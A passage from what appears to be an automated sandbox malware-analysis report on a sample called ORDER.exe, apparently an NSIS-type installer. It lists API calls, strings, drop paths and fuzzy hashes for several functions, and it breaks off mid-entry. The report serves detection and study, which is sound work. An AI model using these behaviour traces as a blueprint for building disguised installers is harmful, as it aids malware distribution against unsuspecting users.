                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: CallbackDispatcherUser
                          • String ID:
                          • API String ID: 2492992576-0
                          • Opcode ID: caaff2729d3fe7bae5ae998927534049a5cfce9e2193b3926e4c56a419af128c
                          • Instruction ID: f87940b9544c4de7e657a104dd6f20edac94ef916c9b89b279468f5034d51d6a
                          • Opcode Fuzzy Hash: caaff2729d3fe7bae5ae998927534049a5cfce9e2193b3926e4c56a419af128c
                          • Instruction Fuzzy Hash: E2A01231404001DBCB014B10DF04C45FF21B7503007018030E50140034C6310420FF09
                          APIs
                          • Sleep.KERNELBASE(00000000), ref: 004014E5
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: c9c2d380323125baba7308e94fb33277af884a6ec96610a08fce4469fec28eac
                          • Instruction ID: 4daead48d26ae6742cc4751adb680189456718570d67c7320b978f12710e1ab5
                          • Opcode Fuzzy Hash: c9c2d380323125baba7308e94fb33277af884a6ec96610a08fce4469fec28eac
                          • Instruction Fuzzy Hash: DFD0C7B7B141006BD750E7B86E8545A73E8F75135A7148837D502E1191D17DC9415519
                          APIs
                          • GetDlgItem.USER32(?,000003F9), ref: 004049B4
                          • GetDlgItem.USER32(?,00000408), ref: 004049BF
                          • GlobalAlloc.KERNEL32(?,?), ref: 00404A09
                          • LoadBitmapA.USER32(0000006E), ref: 00404A1C
                          • SetWindowLongA.USER32(?,?,00404F93), ref: 00404A35
                          • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404A49
                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A5B
                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404A71
                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A7D
                          • SendMessageA.USER32(?,0000111B,?,00000000), ref: 00404A8F
                          • DeleteObject.GDI32(00000000), ref: 00404A92
                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404ABD
                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404AC9
                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B5E
                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B89
                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B9D
                          • GetWindowLongA.USER32(?,?), ref: 00404BCC
                          • SetWindowLongA.USER32(?,?,00000000), ref: 00404BDA
                          • ShowWindow.USER32(?,00000005), ref: 00404BEB
                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404CE8
                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404D4D
                          • SendMessageA.USER32(?,?,00000000,00000000), ref: 00404D62
                          • SendMessageA.USER32(?,00000420,00000000,?), ref: 00404D86
                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404DA6
                          • ImageList_Destroy.COMCTL32(00000000), ref: 00404DBB
                          • GlobalFree.KERNEL32(00000000), ref: 00404DCB
                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404E44
                          • SendMessageA.USER32(?,00001102,?,?), ref: 00404EED
                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EFC
                          • InvalidateRect.USER32(?,00000000,?), ref: 00404F1C
                          • ShowWindow.USER32(?,00000000), ref: 00404F6A
                          • GetDlgItem.USER32(?,000003FE), ref: 00404F75
                          • ShowWindow.USER32(00000000), ref: 00404F7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                          • String ID: $M$N
                          • API String ID: 1638840714-813528018
                          • Opcode ID: f96aeeab4a25318005a3a9f7b7ecea2fbdc3284bb246aef355b8d85046c4ff9d
                          • Instruction ID: ec1b41ef9246f4b5ca9c31e675ea93c5522bc938a585a88f05d0904c7564d9ec
                          • Opcode Fuzzy Hash: f96aeeab4a25318005a3a9f7b7ecea2fbdc3284bb246aef355b8d85046c4ff9d
                          • Instruction Fuzzy Hash: 7A025FB0900209AFEB10DF94DC85AAE7BB5FB84315F10817AFA10B62E1D7789D42DF58
                          APIs
                          • GetDlgItem.USER32(?,000003FB), ref: 00404479
                          • SetWindowTextA.USER32(00000000,?), ref: 004044A3
                          • SHBrowseForFolderA.SHELL32(?,0041F0D0,?), ref: 00404554
                          • CoTaskMemFree.OLE32(00000000), ref: 0040455F
                          • lstrcmpiA.KERNEL32(Call,Stvkonsekvenserne115 Setup: Installing), ref: 00404591
                          • lstrcatA.KERNEL32(?,Call), ref: 0040459D
                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004045AF
                            • Part of subcall function 0040552E: GetDlgItemTextA.USER32(?,?,00000400,004045E6), ref: 00405541
                            • Part of subcall function 00405FA1: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ORDER.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77233410,004033C9), ref: 00405FF9
                            • Part of subcall function 00405FA1: CharNextA.USER32(?,?,?,00000000), ref: 00406006
                            • Part of subcall function 00405FA1: CharNextA.USER32(?,"C:\Users\user\Desktop\ORDER.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77233410,004033C9), ref: 0040600B
                            • Part of subcall function 00405FA1: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77233410,004033C9), ref: 0040601B
                          • GetDiskFreeSpaceA.KERNEL32(0041ECC8,?,?,0000040F,?,0041ECC8,0041ECC8,?,00000000,0041ECC8,?,?,000003FB,?), ref: 0040466C
                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404687
                            • Part of subcall function 004047E0: lstrlenA.KERNEL32(Stvkonsekvenserne115 Setup: Installing,Stvkonsekvenserne115 Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,004046FB,000000DF,00000000,00000400,?), ref: 0040487E
                            • Part of subcall function 004047E0: wsprintfA.USER32 ref: 00404886
                            • Part of subcall function 004047E0: SetDlgItemTextA.USER32(?,Stvkonsekvenserne115 Setup: Installing), ref: 00404899
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                          • String ID: A$C:\Users\user\AppData\Local\Rhabdophora\frysere\turnpike$Call$Stvkonsekvenserne115 Setup: Installing
                          • API String ID: 2624150263-561060385
                          • Opcode ID: f98f00a644f458d2e02a584555e30f134e65ef2c05e9b8026b1db21ee3dd4a2e
                          • Instruction ID: 5a451af96f6c61f8b8aedc9e732e962e3b59a2a539d705b9404eba0a1a8e20eb
                          • Opcode Fuzzy Hash: f98f00a644f458d2e02a584555e30f134e65ef2c05e9b8026b1db21ee3dd4a2e
                          • Instruction Fuzzy Hash: A6A162B1900208ABDB11AFA6CD45AEFB7B9EF85314F10843BF611B72D1D77C89418B69
                          APIs
                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402654
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: FileFindFirst
                          • String ID:
                          • API String ID: 1974802433-0
                          • Opcode ID: 8c73969c0d40863ae126986d1f1e8202bdf4bd21bda08d418c229d82633c171d
                          • Instruction ID: 2b7524724565807a685c72c68d6b6eabb337ae57375c882a310f3ed35d4a28aa
                          • Opcode Fuzzy Hash: 8c73969c0d40863ae126986d1f1e8202bdf4bd21bda08d418c229d82633c171d
                          • Instruction Fuzzy Hash: D4F0EC72504110EBD700EBB4994DAEE77B8DF51314F60457BE141F21C1D3B84945E72E
                          APIs
                          • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 004041C0
                          • GetDlgItem.USER32(00000000,000003E8), ref: 004041D4
                          • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 004041F2
                          • GetSysColor.USER32(?), ref: 00404203
                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404212
                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404221
                          • lstrlenA.KERNEL32(?), ref: 00404224
                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404233
                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404248
                          • GetDlgItem.USER32(?,0000040A), ref: 004042AA
                          • SendMessageA.USER32(00000000), ref: 004042AD
                          • GetDlgItem.USER32(?,000003E8), ref: 004042D8
                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404318
                          • LoadCursorA.USER32(00000000,00007F02), ref: 00404327
                          • SetCursor.USER32(00000000), ref: 00404330
                          • ShellExecuteA.SHELL32(0000070B,open,004226A0,00000000,00000000,?), ref: 00404343
                          • LoadCursorA.USER32(00000000,00007F00), ref: 00404350
                          • SetCursor.USER32(00000000), ref: 00404353
                          • SendMessageA.USER32(00000111,?,00000000), ref: 0040437F
                          • SendMessageA.USER32(?,00000000,00000000), ref: 00404393
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                          • String ID: Call$N$open
                          • API String ID: 3615053054-2563687911
                          • Opcode ID: aa854a75b9a8ef41e2656ff54a1ab69c816baf86c41e2f577b142ace3155aca6
                          • Instruction ID: 47d1c741c4840d0b501b4796cf3fe0e3440e9ec9cd7b0debe1a5eac4f9bfffd7
                          • Opcode Fuzzy Hash: aa854a75b9a8ef41e2656ff54a1ab69c816baf86c41e2f577b142ace3155aca6
                          • Instruction Fuzzy Hash: 8F61A0B1A40309BFEB109F61DD45F6A7B69FB84704F108026FB04BB2D1C7B8A951CB99
                          APIs
                          • lstrcpyA.KERNEL32(00421A88,NUL,?,00000000,?,00000000,?,00405C12,?,?,?,004057B5,?,00000000,000000F1,?), ref: 00405A7E
                          • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,00405C12,?,?,?,004057B5,?,00000000,000000F1,?), ref: 00405AA2
                          • GetShortPathNameA.KERNEL32(00000000,00421A88,00000400), ref: 00405AAB
                            • Part of subcall function 0040592C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 0040593C
                            • Part of subcall function 0040592C: lstrlenA.KERNEL32(00405B5B,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 0040596E
                          • GetShortPathNameA.KERNEL32(?,00421E88,00000400), ref: 00405AC8
                          • wsprintfA.USER32 ref: 00405AE6
                          • GetFileSize.KERNEL32(00000000,00000000,00421E88,C0000000,?,00421E88,?,?,?,?,?), ref: 00405B21
                          • GlobalAlloc.KERNEL32(?,0000000A), ref: 00405B30
                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B68
                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00421688,00000000,-0000000A,004093A0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BBE
                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405BD0
                          • GlobalFree.KERNEL32(00000000), ref: 00405BD7
                          • CloseHandle.KERNEL32(00000000), ref: 00405BDE
                            • Part of subcall function 004059C7: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\ORDER.exe,80000000,00000003), ref: 004059CB
                            • Part of subcall function 004059C7: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 004059ED
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                          • String ID: %s=%s$NUL$[Rename]
                          • API String ID: 1265525490-4148678300
                          • Opcode ID: 10d4b8fe51d6b6f2625f365b8b26cf256cf2f07af5c2bd562b8105816d8408bc
                          • Instruction ID: 2d1e09aab0418ff75005a817fdb93eb8b9645243d234663ae25a64343302d3c0
                          • Opcode Fuzzy Hash: 10d4b8fe51d6b6f2625f365b8b26cf256cf2f07af5c2bd562b8105816d8408bc
                          • Instruction Fuzzy Hash: BE41DEB1604A15BFD6206B219C49F6B3A6CDF45718F14053BBE01FA2D2EA7CB8018E7D
                          APIs
                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                          • BeginPaint.USER32(?,?), ref: 00401047
                          • GetClientRect.USER32(?,?), ref: 0040105B
                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                          • DeleteObject.GDI32(?), ref: 004010ED
                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                          • SetBkMode.GDI32(00000000,?), ref: 00401126
                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                          • SelectObject.GDI32(00000000,?), ref: 00401140
                          • DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                          • DeleteObject.GDI32(?), ref: 00401165
                          • EndPaint.USER32(?,?), ref: 0040116E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                          • String ID: F
                          • API String ID: 941294808-1304234792
                          • Opcode ID: c2d680870d7abd1e1a74e136b5aebc8f23ebe5596e06de1d1944de18111d68fb
                          • Instruction ID: ce5436bc7dfccdabf5b2378cdbc04c65b8fc1f8d51739f20964cb8902a5fcb59
                          • Opcode Fuzzy Hash: c2d680870d7abd1e1a74e136b5aebc8f23ebe5596e06de1d1944de18111d68fb
                          • Instruction Fuzzy Hash: F2419A72804249AFCF058F94CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5
                          APIs
                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ORDER.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77233410,004033C9), ref: 00405FF9
                          • CharNextA.USER32(?,?,?,00000000), ref: 00406006
                          • CharNextA.USER32(?,"C:\Users\user\Desktop\ORDER.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77233410,004033C9), ref: 0040600B
                          • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77233410,004033C9), ref: 0040601B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: Char$Next$Prev
                          • String ID: "C:\Users\user\Desktop\ORDER.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                          • API String ID: 589700163-1064304886
                          • Opcode ID: cac177dc58e6cdce4745106bcf32f060ca56d97be21c35c0cc42ba282efa81fa
                          • Instruction ID: 96a923a8ee4f60b6f191beee89bac6a1f57d38d5d4ddb578b75945660f6dc773
                          • Opcode Fuzzy Hash: cac177dc58e6cdce4745106bcf32f060ca56d97be21c35c0cc42ba282efa81fa
                          • Instruction Fuzzy Hash: 57110451908B9229FB325A284C40B777F99CF5A760F18047FE5C1722C2C67C5C529B6E
                          APIs
                          • GetWindowLongA.USER32(?,000000EB), ref: 00404070
                          • GetSysColor.USER32(00000000), ref: 0040408C
                          • SetTextColor.GDI32(?,00000000), ref: 00404098
                          • SetBkMode.GDI32(?,?), ref: 004040A4
                          • GetSysColor.USER32(?), ref: 004040B7
                          • SetBkColor.GDI32(?,?), ref: 004040C7
                          • DeleteObject.GDI32(?), ref: 004040E1
                          • CreateBrushIndirect.GDI32(?), ref: 004040EB
                          Memory Dump Source
                          • Source File: 00000000.00000002.32233404876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.32233330655.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233481624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233557512.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.32233883086.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_ORDER.jbxd
                          Similarity
                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                          • String ID:
                          • API String ID: 2320649405-0
                          • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                          • Instruction ID: 47825c477eeffae7bcc1b4b45db8633c52535f80fcd06c8b97140eed864a5805
                          • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                          • Instruction Fuzzy Hash: 0621A4B18047049BCB309F68DD08B4BBBF8AF40714F048639EA95F26E1C738E944CB65
                          APIs
                          • GlobalFree.KERNEL32(00000000), ref: 1000234A
                            • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                          • GlobalAlloc.KERNEL32(?,?), ref: 100022C3
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                          • GlobalAlloc.KERNEL32(?,?), ref: 100022E7
                          • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                          • GlobalFree.KERNEL32(00000000), ref: 100022FB
                          Memory Dump Source
                          • Source File: 00000000.00000002.32238167410.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000000.00000002.32238142205.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000000.00000002.32238195639.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000000.00000002.32238224100.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10000000_ORDER.jbxd
                          Similarity
                          • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                          • String ID:
                          • API String ID: 3730416702-0
                          • Opcode ID: 5812f53bea9c9c9f79666072e50bc0f3831b96dbb387c6cf78516ccbd9521935
                          • Instruction ID: fe65b043c70383bd2b49c92c90746d4950a0c6047a38c1932a2dc3020861886a
                          • Opcode Fuzzy Hash: 5812f53bea9c9c9f79666072e50bc0f3831b96dbb387c6cf78516ccbd9521935
                          • Instruction Fuzzy Hash: F6418BB1108711EFF720DFA48884B5BB7F8FF443D1F218929F946D61A9DB34AA448B61
                          APIs
                            • Part of subcall function 10001215: GlobalAlloc.KERNEL32(?,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                          • GlobalFree.KERNEL32(?), ref: 100024B9
                          • GlobalFree.KERNEL32(00000000), ref: 100024F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.32238167410.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000000.00000002.32238142205.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000000.00000002.32238195639.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 00000000.00000002.32238224100.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10000000_ORDER.jbxd
                          Similarity
                          • API ID: Global$Free$Alloc
                          • String ID:
                          • API String ID: 1780285237-0
                          • Opcode ID: 28705be4039c1f606362c20ff13fdce37c258c5b4734a68cc6567389004174f8
                          • Instruction ID: 82133e1bc6da927614d5bcfc3b496831b4cb396c3e6da136b8b2dca3161aa200
                          • Opcode Fuzzy Hash: 28705be4039c1f606362c20ff13fdce37c258c5b4734a68cc6567389004174f8
